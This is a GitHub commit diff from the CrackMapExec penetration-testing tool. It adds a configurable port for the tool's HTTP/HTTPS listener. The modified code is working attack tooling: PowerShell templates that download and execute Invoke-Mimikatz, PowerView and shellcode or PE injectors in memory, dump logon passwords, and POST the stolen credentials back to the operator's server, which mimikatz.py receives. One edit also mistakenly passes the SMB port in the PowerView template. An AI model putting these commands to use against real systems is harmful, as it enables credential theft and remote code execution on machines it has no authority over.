Skip to content
This repository was archived by the owner on Dec 6, 2023. It is now read-only.

Commit f0fe1a2

Browse files
author
byt3bl33d3r
committed
Added option to set the HTTP/HTTPS server port (resolves #33)
1 parent 0d1e580 commit f0fe1a2

File tree

3 files changed

+42
-25
lines changed

3 files changed

+42
-25
lines changed

core/powershell.py

Lines changed: 23 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -32,18 +32,19 @@ def __init__(self, server, localip):
3232
def mimikatz(self, command='privilege::debug sekurlsa::logonpasswords exit'):
3333

3434
command = """
35-
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Mimikatz.ps1');
35+
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Mimikatz.ps1');
3636
$creds = Invoke-{func_name} -Command '{katz_command}';
37-
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}/');
37+
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
3838
$request.Method = 'POST';
3939
$request.ContentType = 'application/x-www-form-urlencoded';
4040
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
4141
$request.ContentLength = $bytes.Length;
4242
$requestStream = $request.GetRequestStream();
4343
$requestStream.Write( $bytes, 0, $bytes.Length );
4444
$requestStream.Close();
45-
$request.GetResponse();""".format(protocol=self.protocol,
46-
func_name=self.func_name,
45+
$request.GetResponse();""".format(protocol=self.protocol,
46+
port=settings.args.server_port,
47+
func_name=self.func_name,
4748
addr=self.localip,
4849
katz_command=command)
4950

@@ -52,30 +53,32 @@ def mimikatz(self, command='privilege::debug sekurlsa::logonpasswords exit'):
5253
def powerview(self, command):
5354

5455
command = """
55-
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/powerview.ps1');
56+
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/powerview.ps1');
5657
$output = {view_command} | Out-String;
57-
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}/');
58+
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}:{port}/');
5859
$request.Method = 'POST';
5960
$request.ContentType = 'application/x-www-form-urlencoded';
6061
$bytes = [System.Text.Encoding]::ASCII.GetBytes($output);
6162
$request.ContentLength = $bytes.Length;
6263
$requestStream = $request.GetRequestStream();
6364
$requestStream.Write( $bytes, 0, $bytes.Length );
6465
$requestStream.Close();
65-
$request.GetResponse();""".format(protocol=self.protocol,
66+
$request.GetResponse();""".format(protocol=self.protocol,
67+
port=settings.args.port,
6668
addr=self.localip,
6769
view_command=command)
6870

6971
return ps_command(command)
7072

7173
def inject_meterpreter(self):
7274
command = """
73-
IEX (New-Object Net.WebClient).DownloadString('{0}://{1}/Invoke-Shellcode.ps1');
74-
Invoke-{2} -Force -Payload windows/meterpreter/{3} -Lhost {4} -Lport {5}""".format(self.protocol,
75+
IEX (New-Object Net.WebClient).DownloadString('{0}://{1}:{2}/Invoke-Shellcode.ps1');
76+
Invoke-{3} -Force -Payload windows/meterpreter/{4} -Lhost {5} -Lport {6}""".format(self.protocol,
77+
settings.args.server_port,
7578
self.localip,
7679
self.func_name,
77-
settings.args.inject[4:],
78-
settings.args.met_options[0],
80+
settings.args.inject[4:],
81+
settings.args.met_options[0],
7982
settings.args.met_options[1])
8083
if settings.args.procid:
8184
command += " -ProcessID {}".format(settings.args.procid)
@@ -86,10 +89,11 @@ def inject_meterpreter(self):
8689

8790
def inject_shellcode(self):
8891
command = """
89-
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Shellcode.ps1');
92+
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-Shellcode.ps1');
9093
$WebClient = New-Object System.Net.WebClient;
91-
[Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}/{shellcode}');
94+
[Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}:{port}/{shellcode}');
9295
Invoke-{func_name} -Force -Shellcode $bytes""".format(protocol=self.protocol,
96+
port=settings.args.server_port,
9397
func_name=self.func_name,
9498
addr=self.localip,
9599
shellcode=settings.args.path.split('/')[-1])
@@ -103,11 +107,12 @@ def inject_shellcode(self):
103107

104108
def inject_exe_dll(self):
105109
command = """
106-
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-ReflectivePEInjection.ps1');
107-
Invoke-{func_name} -PEUrl {protocol}://{addr}/{pefile}""".format(protocol=self.protocol,
108-
func_name=self.func_name,
109-
addr=self.localip,
110-
pefile=settings.args.path.split('/')[-1])
110+
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}:{port}/Invoke-ReflectivePEInjection.ps1');
111+
Invoke-{func_name} -PEUrl {protocol}://{addr}:{port}/{pefile}""".format(protocol=self.protocol,
112+
port=settings.args.server_port,
113+
func_name=self.func_name,
114+
addr=self.localip,
115+
pefile=settings.args.path.split('/')[-1])
111116

112117
if settings.args.procid:
113118
command += " -ProcID {}"

core/servers/mimikatz.py

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -89,14 +89,14 @@ def do_POST(self):
8989
for line in buf:
9090
print_att(line.strip())
9191

92-
def http_server():
93-
http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
92+
def http_server(port):
93+
http_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
9494
t = Thread(name='http_server', target=http_server.serve_forever)
9595
t.setDaemon(True)
9696
t.start()
9797

98-
def https_server():
99-
https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer)
98+
def https_server(port):
99+
https_server = BaseHTTPServer.HTTPServer(('0.0.0.0', port), MimikatzServer)
100100
https_server.socket = ssl.wrap_socket(https_server.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True)
101101
t = Thread(name='https_server', target=https_server.serve_forever)
102102
t.setDaemon(True)

crackmapexec.py

Lines changed: 15 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -72,7 +72,7 @@
7272
parser.add_argument('--kerb', action="store_true", dest='kerb', help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters')
7373
parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
7474
parser.add_argument("--server", choices={'http', 'https'}, default='http', help='Use the selected server (defaults to http)')
75-
#parser.add_argument("--server-port", type=int, help='Start the server on the specified port')
75+
parser.add_argument("--server-port", type=int, help='Start the server on the specified port')
7676

7777
#How much fail can we limit? can we fail at failing to limit? da da da dum
7878
parser.add_argument("--fail-limit", metavar='LIMIT', type=int, default=None, help='The max number of failed login attempts allowed per host (default: None)')
@@ -150,6 +150,18 @@
150150
patterns = []
151151
targets = []
152152

153+
if args.server == 'http':
154+
if args.server_port:
155+
args.http_port = args.server_port
156+
else:
157+
args.server_port = 80
158+
159+
if args.server == 'https':
160+
if args.server_port:
161+
args.https_port = args.server_port
162+
else:
163+
args.server_port = 443
164+
153165
init_args(args)
154166

155167
if args.verbose:
@@ -245,10 +257,10 @@ def get_targets(target):
245257

246258
if args.mimikatz or args.powerview or args.mimikatz_cmd or args.inject or args.ntds == 'ninja':
247259
if args.server == 'http':
248-
http_server()
260+
http_server(args.server_port)
249261

250262
elif args.server == 'https':
251-
https_server()
263+
https_server(args.server_port)
252264

253265
def concurrency(targets):
254266
'''

0 commit comments

Comments
 (0)